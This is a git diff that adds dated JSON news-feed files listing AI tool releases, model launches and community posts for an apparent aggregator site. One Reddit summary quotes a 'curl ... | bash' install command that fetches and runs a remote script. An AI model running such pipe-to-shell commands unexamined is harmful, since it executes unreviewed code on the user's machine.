I’m looking to buy for a very specific AI development workflow, and I’m thinking between an NVIDIA RTX PRO 5000 48GB (Blackwell) workstation and a MacBook Pro M5 Max 128GB.\n\nMy job is just needing to fine-tune with sma", + "category": "ai_models" + }, + { + "title": "Acceptable prompt processing speed for you?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spmsxy/acceptable_prompt_processing_speed_for_you/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T08:00:39.000Z", + "summary": "I am currently optimising some ancient hardware to run qwen3 (4xV100s) but the lack of flash attention means that at longer contexts the processing starts to really slow down. \n\nFor agentic coding work what processing speeds and contexts lengths do you consider as acceptable or good?", + "category": "ai_models" + }, + { + "title": "Notion’s Token Town: 5 Rebuilds, 100+ Tools, MCP vs CLIs and the Software Factory Future — Simon Last & Sarah Sachs of Notion", + "url": "https://www.latent.space/p/notion", + "source": "Latent Space", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.98, + "date": "2026-04-19T18:00:16.628Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Prepay for the Gemini API to get more control over your spend", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/prepay-gemini-api/", + "source": "Google AI Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.94, + "date": "2026-04-19T18:00:09.702Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "🗞️ Google just launched Gemini 3.1 Flash TTS, a text-to-speech model that takes scene direction, speaker notes", + "url": "https://www.rohan-paul.com/p/google-just-launched-gemini-31-flash", + "source": "Rohan Paul", + "tags": [ + "tool_update" + ], + "matching_tags": [ + 
"tool_update" + ], + "importance": 0.9, + "date": "2026-04-19T18:00:24.143Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-20.json b/data/news-feed-2026-04-20.json new file mode 100644 index 0000000..98273be --- /dev/null +++ b/data/news-feed-2026-04-20.json @@ -0,0 +1,251 @@ +{ + "generated": "2026-06-05T00:44:35.244Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-20", + "article_count": 15, + "archived_story_count": 503, + "articles": [ + { + "title": "PowerShell v7.6.0 released", + "url": "https://github.com/PowerShell/PowerShell/releases/tag/v7.6.0", + "source": "GitHub Releases · PowerShell", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-18T18:49:57.000Z", + "summary": "## [7.6.0] - 2026-03-12\r\n\r\n### General Cmdlet Updates and Fixes\r\n\r\n- Update PowerShell Profile DSC resource manifests to allow `null` for content (#26973)\r\n\r\n### Tests\r\n\r\n- Add GitHub Actions annotations for Pester test failures (#26969)\r\n- Fix `Import-Module.Tests.ps1` to handle Arm32 platform (#26888)\r\n\r\n### Build and Packaging Improvements\r\n\r\n
      \r\n\r\n\r\n\r\n

      Update to .NET SDK 10.0.201

      \r\n\r\n
      \r\n\r\n
        \r\n
      • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041)\r\n\r\n\r\n\r\n

        Update to .NET SDK 10.0.202

        \r\n\r\n
        \r\n\r\n
          \r\n
        • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
        • \r\n
        • Update branch for release (#27287)
        • \r\n
        • Fix package pipeline by adding in PDP-Media direct", + "category": "ai_tools" + }, + { + "title": "Perplexity Computer Just Launched — OpenClaw for the Rest of Us", + "url": "https://x.com/davidlee/status/2046589300188598440", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T14:56:45.085Z", + "summary": "Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption.", + "category": "ai_tools" + }, + { + "title": "Open source Image Generation CLI. One binary.", + "url": "https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-21T00:37:35.000Z", + "summary": "I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs.\n\nIt uses diffusers underneath. The CLI is Rust, the GPU worker is Python. 
One binary, no Docker required.\n\nWhat it looks like:\n\n\\# Install\n\ncurl -fsSL https://modl.run/install | bash\n\n\\# Pu", + "category": "creative_tools" + }, + { + "title": "@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker", + "url": "https://x.com/LumaLabsAI/status/2046356064187363368", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-20T23:53:38.094Z", + "summary": "Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills.", + "category": "ai_tools" + }, + { + "title": "I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent", + "url": "https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-21T17:52:07.000Z", + "summary": "I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused.\n\nThat made sense at the start. 
Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow.\n\nBut after building a few integrations, I kept running into the same uncomfortable question:\n\nIf I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C", + "category": "ai_tools" + }, + { + "title": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", + "url": "https://x.com/Ali_TongyiLab/status/2044771299483107739", + "source": "X / @ali_tongyilab", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-16T13:34:02.000Z", + "summary": "1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source \n\nWe are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters.\n\nCore Capabilities:\n• Exceptional Agentic Coding: Engineered", + "category": "ai_tools" + }, + { + "title": "Open source CRT animation lora for ltx 2.3", + "url": "https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-20T16:22:01.000Z", + "summary": "None of the video gen models do a real CRT terminal animation look.\n\nWeights + recipe:\n\n🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora)", + "category": "creative_tools" + }, + { + "title": "LinkedIn Launched Blind 
AI Model Comparison — Finally a Practical Evaluation Tool", + "url": "https://x.com/DataconomyMedia/status/2046589880226996228", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-21T14:56:45.085Z", + "summary": "Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers.", + "category": "ai_tools" + }, + { + "title": "Scoble: I Took My AI to Stanford — It Has My Personality Now", + "url": "https://x.com/Scobleizer/status/2046495684493562130", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T14:55:24.550Z", + "summary": "Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality.", + "category": "ai_tools" + }, + { + "title": "I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com", + "url": "https://x.com/Scobleizer/status/2046194231321190735", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-20T23:50:37.016Z", + "summary": "Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon.", + "category": "ai_tools" + }, + { + "title": "[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)", + "url": "https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds", + "source": "Latent Space", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9, + "date": "2026-04-21T06:00:30.085Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Framework Laptop 
13 Pro", + "url": "https://frame.work/laptop13pro", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.8899999999999999, + "date": "2026-04-21T18:00:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?", + "url": "https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.87, + "date": "2026-04-21T14:30:07.000Z", + "summary": "Hi everyone,\n\nI really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup.\n\nRight now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance?\n\nI just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations ", + "category": "creative_tools" + }, + { + "title": "ComfyUI + CUDA + Docker in a single command", + "url": "https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8600000000000001, + "date": "2026-04-21T14:06:06.000Z", + "summary": "What's up everyone! 
So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything.\n\nThe goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA:\n\n* Uses NVIDIA Container Toolkit for GPU passthrough\n* Persistent storage via a Docker volume\n* No modifications to ComfyUI itself\n* G", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-22.json b/data/news-feed-2026-04-22.json new file mode 100644 index 0000000..5addd58 --- /dev/null +++ b/data/news-feed-2026-04-22.json @@ -0,0 +1,247 @@ +{ + "generated": "2026-06-05T00:44:35.627Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-22", + "article_count": 15, + "archived_story_count": 587, + "articles": [ + { + "title": "Qwen Code v0.15.0 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-22T11:45:35.000Z", + "summary": "## What's Changed\n* feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248\n* feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100\n* feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827\n* fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g", + "category": "ai_tools" + }, + { + "title": "gpt-5.4 Is Patching Your Code Without Asking", + "url": 
"https://x.com/N8Programs/status/2046725816126460254", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries.", + "category": "ai_tools" + }, + { + "title": "I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).", + "url": "https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-22T19:58:13.000Z", + "summary": "I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. \nNo terminal. No code. Just the stuff that actually works for normal knowledge work.\n\nWhat Cowork actually is\n\nMost AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. 
The big difference from regular Claude chat is it can handle multi-", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/oidc@3.2.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.76, + "date": "2026-04-22T00:29:41.000Z", + "summary": "### Patch Changes\n\n- Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w", + "category": "ai_tools" + }, + { + "title": "Remotion v4.0.451 released", + "url": "https://github.com/remotion-dev/remotion/releases/tag/v4.0.451", + "source": "GitHub Releases · Remotion", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-22T06:46:26.000Z", + "summary": "## What's Changed\n\nFixes version mismatches appearing when running the CLI.\n\n**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451\n", + "category": "ai_tools" + }, + { + "title": "How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20", + "url": "https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas", + "source": "Hugging Face Blog", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-22T18:00:15.535Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "GPT-5.5 Spud Is Rumored for 
Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7", + "url": "https://x.com/bridgemindai/status/2046919920953282921", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T14:46:06.595Z", + "summary": "GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships.", + "category": "ai_tools" + }, + { + "title": "Opensource autoregressive models", + "url": "https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-22T08:37:26.000Z", + "summary": "I am interested why there no autoregressive models like gpt-image or nano-banana in open source. \nOk, i am know about hunyan, but its not competetive with google and openai. \n\nIn LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models.\n\nWhy qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this.\n\n", + "category": "creative_tools" + }, + { + "title": "Hermes Just Became a Different Kind of Agent", + "url": "https://x.com/NousResearch/status/2046721845261652066", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. 
The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem.", + "category": "ai_tools" + }, + { + "title": "Cursor Is Built on Open Source and Worth $60 Billion", + "url": "https://x.com/BLUECOW009/status/2046725740134052232", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era.", + "category": "ai_tools" + }, + { + "title": "Crush v0.62.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.0", + "source": "GitHub Releases · Crush", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.94, + "date": "2026-04-22T21:08:45.000Z", + "summary": "# 98% reduction in token usage\r\n\r\nYou read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default.\r\n\r\n## Small system prompt\r\n\r\nThis was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default.\r\n\r\nCrush used to have long descriptions for tools with instruction on how to use them. 
Turns out that models got a lot better with time, and now the", + "category": "ai_tools" + }, + { + "title": "GitHub CLI now collects pseudoanonymous telemetry", + "url": "https://cli.github.com/telemetry", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.91, + "date": "2026-04-22T11:58:58.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "[AINews] OpenAI launches GPT-Image-2", + "url": "https://www.latent.space/p/ainews-openai-launches-gpt-image", + "source": "Latent Space", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-22T06:00:41.638Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google unveils two new TPUs designed for the “agentic era”", + "url": "https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/", + "source": "Ars Technica AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8200000000000001, + "date": "2026-04-22T18:00:20.329Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Prisma 7.8.0 released", + "url": "https://github.com/prisma/prisma/releases/tag/7.8.0", + "source": "GitHub Releases · Prisma", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.78, + "date": "2026-04-22T14:19:23.000Z", + "summary": "Today, we are excited to share the `7.8.0` stable release 🎉\r\n\r\n**🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!**\r\n\r\n# Highlights\r\n\r\n## ORM\r\n\r\n### Features\r\n\r\n**Prisma Client**\r\n\r\n- Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. 
A larger value can improve performance", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-23.json b/data/news-feed-2026-04-23.json new file mode 100644 index 0000000..77fa8be --- /dev/null +++ b/data/news-feed-2026-04-23.json @@ -0,0 +1,207 @@ +{ + "generated": "2026-06-05T00:44:35.807Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-23", + "article_count": 13, + "archived_story_count": 167, + "articles": [ + { + "title": "Gemini CLI v0.39.0 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-23T04:12:56.000Z", + "summary": "## What's Changed\n* refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849\n* feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876\n* feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544\n* chore(release): bump version to 0.39.0-nightly.202604", + "category": "ai_tools" + }, + { + "title": "Google Cloud launches two new AI chips to compete with Nvidia", + "url": "https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-23T06:07:24.599Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "OpenAI Just Made ChatGPT a Team Sport", + "url": "https://x.com/eddiboi/status/2047009433255854119", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": 
[ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure.", + "category": "ai_tools" + }, + { + "title": "Anthropic Just Sent a Fleet of Bug Hunters Into Your Code", + "url": "https://x.com/AIRoboticsInt/status/2047012029169324532", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale.", + "category": "ai_tools" + }, + { + "title": "Character.AI Finally Remembers You", + "url": "https://x.com/character_ai/status/2047030699417571565", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational.", + "category": "ai_tools" + }, + { + "title": "Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now", + "url": "https://x.com/replicate/status/2047027042781106649", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. 
Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving.", + "category": "ai_tools" + }, + { + "title": "One OAuth Token Brought Down Vercel, GitHub, and npm", + "url": "https://x.com/Obots_ai/status/2046952458207838375", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today.", + "category": "ai_tools" + }, + { + "title": "Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3", + "url": "https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration", + "source": "Hugging Face Blog", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-23T06:07:22.934Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "OpenAI's response to the Axios developer tool compromise", + "url": "https://openai.com/index/axios-developer-tool-compromise/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.82, + "date": "2026-04-23T00:45:01.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Amuse V3.3.3 Pre-release Available.", + "url": "https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.78, + "date": "2026-04-23T01:10:52.000Z", + "summary": "Amuse V3.3.3 Pre-release is now available. 
4.0 release coming in July.\n\n[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3)\n\nV3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also.\n\nEssentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything ", + "category": "creative_tools" + }, + { + "title": "Goose v1.32.0 released", + "url": "https://github.com/aaif-goose/goose/releases/tag/v1.32.0", + "source": "GitHub Releases · Goose", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.76, + "date": "2026-04-23T07:45:24.000Z", + "summary": "## ✨ Features\n\n- Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487)\n- Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647)\n- @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571)\n- `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600)\n- Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745)\n- Auto-compaction for goose2 context window ", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.1 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-23T03:57:40.000Z", + "summary": "## What's Changed\n* fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525\n* feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512\n* fix(cli): stop slash completion render loop by @LaZzyMan in 
https://github.com/QwenLM/qwen-code/pull/3533\n* chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541\n\n\n**Full C", + "category": "ai_tools" + }, + { + "title": "Last week in Generative Image & Video", + "url": "https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.54, + "date": "2026-04-23T04:19:34.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week:\n\n* Motif-Video 2B\n * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V.\n * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests.\n * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B)\n\nhttps://reddit.com", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-25.json b/data/news-feed-2026-04-25.json new file mode 100644 index 0000000..c493ecb --- /dev/null +++ b/data/news-feed-2026-04-25.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:36.117Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-25", + "article_count": 15, + "archived_story_count": 689, + "articles": [ + { + "title": "Stop switching tabs for prompting. 
I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse", + "url": "https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-25T20:20:33.000Z", + "summary": "If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session.\n\nI built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o", + "category": "creative_tools" + }, + { + "title": "Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-25T03:09:10.000Z", + "summary": "I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. 
